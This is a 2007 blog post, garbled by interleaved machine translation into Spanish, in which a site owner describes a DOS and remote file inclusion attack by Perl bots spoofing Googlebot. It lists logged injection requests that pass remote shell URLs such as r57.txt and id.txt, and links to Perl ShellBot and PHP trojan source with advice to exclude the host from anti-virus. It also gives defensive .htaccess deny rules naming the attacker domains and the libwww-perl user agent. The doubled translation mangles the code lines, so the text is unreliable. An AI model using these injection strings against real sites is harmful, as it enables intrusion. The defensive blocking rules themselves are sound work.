Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan Masa de inyección de código remoto como Googlebot - Spoofing de paquetes de Perl y bot troyano

    • Dec Diciembre
    • 21 21

    Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan Masa de inyección de código remoto como Googlebot - Spoofing de paquetes de Perl y bot troyano

    Posted by Noah Ark 9 months, 1 week ago . Publicado por Arca de Noé 9 meses, 1 semana.

    Filed under Security & injection . Guardado en Seguridad y la inyección.

    de propiedad de gato For this past three days this blog is suffering DOS attack . Por este tres últimos días en este blog está sufriendo ataques DOS. The attack is still alive now I don’t think they will leave yet. El ataque está todavía vivo ahora no creo que dejará aún.

    I cant banned this bot directly as they were sending forge packet (packet spoofing) as googlebot http://www.whois-search.com/whois/64.233.166.136. I cant prohibido este robot directamente, ya que se forja el envío de paquetes (paquetes de suplantación de identidad), como googlebot http://www.whois-search.com/whois/64.233.166.136. Im still looking for the right ISP. Im aún buscan el derecho ISP. 

     OrgName: Google Inc. OrgName: Google Inc 
 OrgID: GOGL OrgID: GOGL 
 Address: 1600 Amphitheatre Parkway Dirección: 1600 Amphitheater Parkway 
 City: Mountain View Ciudad: Mountain View 
 StateProv: CA StateProv: CA 
 PostalCode: 94043 Código Postal: 94043 
 Country: US País: EE.UU.

    At the time being I blocked all remote streams from their random host *.com and “perl bot signature” but blocking will not stop them from hammering this site. En el momento que se me bloquearon todos los flujos de distancia de su anfitrión al azar y *. com "perl bot firma", pero el bloqueo no se detendrá el martilleo de este sitio. I’ll be sending 503 (Service Unavailable) on certain request so if you are having problem accessing this site please check back later. Me va a enviar 503 (Servicio no disponible), relativa a determinadas solicitud de modo que si usted está teniendo problemas para acceder a este sitio, por favor, vuelva más tarde.

    Type of injections Tipo de inyecciones

    There is lot uri parameter in my logs (I will disabled server logs - limit resources) they probably has a large inventories check-lists of known CMS vulnerabilities. Hay mucho uri parámetro en mi logs (I will discapacitados logs del servidor - límite de los recursos) que probablemente tiene una gran inventarios de listas de verificación de vulnerabilidades conocidas CMS. I can only confirm that its a blackhat seo spams bot as they request uri include the typical order.php page. Sólo puedo confirmar que uno de sus blackhat SEO spam bots, ya que URI de la solicitud incluirá la típica order.php página. 

     /es/wordpress/how-to-removed-wordpress-net-in-spam-injection-infected-by-mike-ja / es / wordpress / cómo-a-retirado-wordpress-net-en-spam de inyección infectados por Mike-ja 
  gger-goro-class-mailphp/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? gger-goro-class-mailphp/order.php /? wp http://hom3.t35.com/xpl/hack/id.txt =? 
 /es/wordpress/order.php/?wp=http://hom3.t35.com/xpl/hack/id.txt? / es / wordpress / order.php /? wp http://hom3.t35.com/xpl/hack/id.txt =? 
 /order.php?wp=http://hom3.t35.com/xpl/hack/id.txt? / order.php? wp http://hom3.t35.com/xpl/hack/id.txt =?

    To view the following source you need to exclude the website host from your anti-virus program. Para ver la siguiente fuente que necesita para excluir el sitio web de su programa anti-virus.

    • Perl/ShellBot.B trojan - http://hom3.t35.com/xpl/fidz/hack/bnc.txt Perl / troyano ShellBot.B - http://hom3.t35.com/xpl/fidz/hack/bnc.txt
    • PHP/Rst.S Trojan - http://hom3.t35.com/xpl/fidz PHP / Rst.S Trojan - http://hom3.t35.com/xpl/fidz

    htaccess blocked bad Code Injector and Perl Bot (Botnet) htaccess bloqueado mala Código de inyectores y Perl Bot (botnet)

    If you has similar problems. Si usted tiene problemas similares. you should block the following domain in your htaccess. usted debe bloquear el siguiente dominio en el htaccess.
    mod_setenvif 

     SetEnvIfNoCase Referer "^http://(www.)?t35\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? T35 \. Com" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?jorgevolio\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Jorgevolio \. Com" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?emabe\.com" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Emabe \. Com" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?pawang\.in" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Pawang \. En" codeinjector_ref = 1 
 SetEnvIfNoCase Referer "^http://(www.)?gw-gold\.net" codeinjector_ref=1 SetEnvIfNoCase Referer "^ http:// (www.)? Gw-oro \. Net" codeinjector_ref = 1 
 SetEnvIfNoCase User-Agent "^libwww-perl*" shell_bots=1 SetEnvIfNoCase User-Agent "^ libwww-perl *" shell_bots = 1 
 SetEnvIfNoCase User-Agent "^Amidalla*" shell_bots=1 SetEnvIfNoCase User-Agent "^ * Amidalla" shell_bots = 1 

 <FilesMatch "(.*)"> <FilesMatch "(.*)"> 
 Order Allow,Deny Orden permitir, negar 
 Allow from all Dejar de todas las 
 Deny from env=codeinjector_ref Denegar de env = codeinjector_ref 
 Deny from env=shell_bots Denegar de env = shell_bots 
 </FilesMatch> </ FilesMatch>

    if u arent sure if you server support mod_setenvif wrap it like the below example. si u arent seguro de si el soporte para el servidor de recapitulación mod_setenvif como el siguiente ejemplo. 

     <IfModule mod_setenvif.c> <IfModule Mod_setenvif.c> 
 #...replace this line with the above code... # ... reemplazar esta línea con el código anterior ... 
 </IfModule> </ IfModule>

    How to trap Perl Shell Bot ¿Cómo trampa Perl Shell Bot

    We need a pattern to trap this bots. Necesitamos un modelo para los robots esta trampa. certainly we knew that these bots : Ciertamente sabíamos que estos robots:

    • doesn’t honor robot.txt no robot.txt honor
    • they crawl all subdirectory de rastreo de todos los subdirectorio
    • they has a pattern URI request que tiene un patrón de solicitud URI

    For now I only create subdirectory for auto-ban (and some other stuff) based on their pattern. Por ahora sólo crear subdirectorio para auto de prohibición (y algunas otras cosas) sobre la base de su patrón. alexa bot will be banned too as they dont honor robot.txt. Alexa bot se prohibió también que robot.txt No honor.

    I’ll be updating this post from time to time. Voy a estar actualizando este post de vez en cuando. Do check the related articles on how to packet spoofing and validating forge/spoof packet. Hacemos controles de los artículos relacionados sobre la forma de paquetes de suplantación de identidad y validación de forjar / falso paquete.

    Recent Scan & Update Scan & reciente actualización

    The below list is automatically added. La lista a continuación se añade automáticamente.

    December 24, 2007 24 de diciembre de 2007
    ip: 64.26.63.10 param: login= , ? inject: http://pawang.in/r57.txt IP: 64.26.63.10 parámetros: login =,? inyectar: http://pawang.in/r57.txt
    December 24, 2007 24 de diciembre de 2007
    ip: 64.26.63.10 param: dir= , login= inject: http://pawang.in/r57.txt???? IP: 64.26.63.10 parámetro: dir =, login = inyectar: http://pawang.in/r57.txt?
    December 25, 2007 25 de diciembre de 2007
    ip: 59.158.128.138 param: p= , :allinurl= inject: http://gw-gold.net/jpg/pictures/test.txt IP: 59.158.128.138 parámetros: p =,: = inyectar allinurl: http://gw-gold.net/jpg/pictures/test.txt

    External Resources Recursos Externos

    About the Author Sobre el Autor

     

    Tags: Tags:
    • December 21, 2007 at 10:48 pm 21 de diciembre de 2007 a las 10:48 pm
    • February 16, 2008 at 3:05 am 16 de febrero de 2008 a 3:05 horas
    • 0.3 0,3
    • url URL

    • No Responses toMass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan No Responses to "Misa de inyección de código remoto como Googlebot - Spoofing de paquetes de Perl y troyano bot"

      Trackback URL: Trackback URL: Use the TrackBack url ↑ to ping this article. Utilice el TrackBack URL ↑ hacer ping a este artículo. If your blog does not support Trackbacks you might want to leave a comment instead. Si tu blog no soporta Trackbacks puede que desee dejar un comentario lugar.
        • RE: Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan - 'The Guide' ↓ RE: Masa de inyección de código remoto como Googlebot - Spoofing de paquetes de Perl bot y Trojan - 'La Guía' ↓
          Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan Kakkoi 9 months, 1 week ago 5 url Masa de inyección de código remoto como Googlebot - Spoofing de paquetes de Perl y troyano bot Kakkoi 9 meses, 1 semana 5 URL
          Marvin, punto de vista de armas

          The following "Code" are designed to protect you and other users of this site. El siguiente "Código" tienen por objeto proteger a usted ya otros usuarios de este sitio.

          • Be relevant: Your comment should be a thoughtful contribution to the subject of the entry. Ser pertinentes: Su comentario debería ser un aporte reflexivo al tema de la entrada. Keep your comments constructive and polite. Mantenga sus comentarios constructivos y educado.
          • No advertising or spamming: Do not use the comment feature to promote commercial entities/products, affiliates services or websites. No se insertará publicidad ni spam: No utilice la característica de comentario para promover entidades comerciales / productos, servicios afiliados o sitios web. You are allowed to post a link as long as it's relevant to the entry. A usted se le permite enviar un enlace siempre que es pertinente para la entrada.
          • Keep within the law: Do not link to offensive or illegal content websites. Mantenga dentro de la ley: No a la ofensiva de enlace o de contenido ilegal sitios web. Do not make any defamatory or disparaging comments which might damage the reputation of a person or organisation. No haga ninguna difamatorio o denigrante comentarios que puedan dañar la reputación de una persona u organización.
          • Privacy: Do not post any personal information relating to yourself or anyone else - (ie: address, place of employment, telephone or mobile number or email address). Privacidad: No se debe publicar cualquier información personal relativa a usted oa cualquier otra persona - (es decir: dirección, lugar de trabajo, teléfono o número de teléfono móvil o dirección de correo electrónico).

          In order to keep these experiences enjoyable and interesting for all of our users, we ask that you follow the above guidlines. Con el fin de mantener estas experiencias agradable e interesante para todos nuestros usuarios, le pedimos que siga las Directrices.

          be the first to comment. ser el primero en comentar.

          Kakkoi Feel free to engage, ask questions, and tell us what you are thinking! Siéntase libre para participar, hacer preguntas, y nos dicen lo que están pensando! Regular and insightful comments are most welcomed. Regular y perspicaces comentarios son la mayoría acogió con beneplácito.

    "write as if you were talking to a good friend (in front of your mother)." "escribir como si estuviera hablando con un buen amigo (en frente de su madre)."

    .have your say . Usted tiene la palabra

    Disclaimer: For any content that you post, you hereby grant to Kakkoi the royalty-free, irrevocable, perpetual, exclusive and fully sublicensable license to use, reproduce, modify, adapt, publish, translate, create derivative works from, distribute, perform and display such content in whole or in part, world-wide and to incorporate it in other works, in any form, media or technology now known or later developed. Some rights reserved. Descargo de responsabilidad: Para cualquier contenido que usted post, usted otorga a Kakkoi la libre de regalías, irrevocable, perpetuo, exclusivo y totalmente sublicensable licencia para utilizar, reproducir, modificar, adaptar, publicar, traducir, crear trabajos derivados, distribuir, ejecutar y mostrar dicho contenido en su totalidad o en parte, en todo el mundo e incorporarlo en otros trabajos, en cualquier forma, los medios de comunicación o tecnología conocida ahora o desarrollada más adelante. Algunos derechos reservados.

MySQL query error MySQL Query error